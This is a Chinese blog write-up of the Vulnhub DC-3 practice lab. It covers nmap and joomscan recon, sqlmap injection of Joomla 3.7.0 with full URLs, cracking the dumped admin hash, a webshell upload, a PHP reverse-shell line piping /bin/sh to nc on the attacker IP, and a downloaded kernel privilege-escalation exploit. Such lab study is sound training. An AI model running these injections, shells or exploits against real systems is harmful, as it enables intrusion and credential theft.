Vulnhub靶机DC3渗透测试详解
Vulnhub靶机介绍:
Vulnhub靶机下载:
Vulnhub靶机安装:
Vulnhub靶机漏洞详解:
①:信息收集:
②:漏洞发现:
③:SQL注入:
④:文件上传:
⑤:提权:
Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
官网地址:http://www.five86.com/downloads/DC-3-2.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.24
使用命令:nmap -sS -sV -A -n 172.16.5.24
就开了一个80端口,直接访问发现是Joomla 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等。
Joomla!是一套全球知名的内容管理系统,Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统。
这里需要使用一个工具joomscan 因为最新kali没有 又去装了一下又学习了一下。
(JoomScan):是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地扫描Joomla安装,同时通过其轻量级和模块化架构留下最小的占地面积。它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统。
git clone https://github.com/rezasp/joomscan.git ##下载源码
1
cd joomscan ##进入路径
1
perl joomscan.pl ##运行
1
一些最基本的参数 使用命令:perl joomscan.pl --url 172.16.5.24
通过上面的 探测我们可以知道Joomla 的版本 3.7.0 以及CMS的后台地址/administrator/ (说明工具还是强大的,爆赞👍)
②:漏洞发现:
通过上面信息收集的基本信息我们可以 去发现漏洞 使用工具searchsploit 搜Joomla 的版本号即可。
这里回显的是一个SQL注入的漏洞 根据这个思路我们需要对网页进行SQL注入的一些操作。
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomscan-1.txt
1
cat joomscan-1.txt
1
③:SQL注入:
直接上sqlmap吧 sqlmap就是自动化检测sql的工具,发现了五个数据库。
sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
1
sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
1
sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering] #列出表
1
注入查询#__users表 发现有6列 知道列了就可以进行下一步字段的操作
sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
1
注入查询#__users表的name、password字段
sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
1
在桌面随便建一个文件把password的hash密文放进去 然后使用john进行爆破 密码:snoopy
vim joomla-admin-hash #随便取个名字就就可以了
1
④:文件上传:
访问172.16.5.24/administrator/
登入进去输入:http://172.16.5.24/templates/beez3/html/shell.php 上传一个shell.php 然后执行 然后使用蚁剑连接🔗
进入虚拟终端看了一下权限 发现全是还是比较小 所以需要提权
⑤:提权:
编写反弹shell的PHP代码 监听4444端口,并执行脚本文件,将反弹靶机shell到kali
nc -lvp 4444 #设置监听端口
1
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.5.42 4444 >/tmp/f');
?>
1
2
3
使用searchsploit工具查找Ubuntu 16.04的提权漏洞
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu.txt
1
cat ubuntu.txt
1
然后根据他给的地址直接 wget 下载 但是我这边不行报错了 可能是访问不到github,所以只能windows 下载然后把他拖进去 不过问题不大 这也是一种思路,
使用命令:python -c "import pty;pty.spawn('/bin/bash')"
因为权限不够所以不能用蚁剑把39772的文件传上去,只能把39772.放到自己kali的网页上面了 然后在开个apache服务。
(DC-3是没有外网的所以我用的这种方法,方法有很多种大家可以多尝试,我也是第一次打,比较菜,大佬绕过就好!)
别忘了开启apache服务 :server apacher2 restart
使用命令:wget http://172.16.5.24/exploit.tar
然后解压:tar -xvf exploit.tar 最后运行提权文件 然后 进入root 看flag即可。
至此获取到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这是做的第四个靶场了,学习的知识点和一些细节就是 :
1.需要注意的细节就是 DC-3 不能访问github 然后就不能直接下载提权的文件
需要开个apache服务然后把文件放上面 在使用wget下载
————————————————
版权声明:本文为CSDN博主「落寞的魚丶」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Aluxian_/article/details/123676768
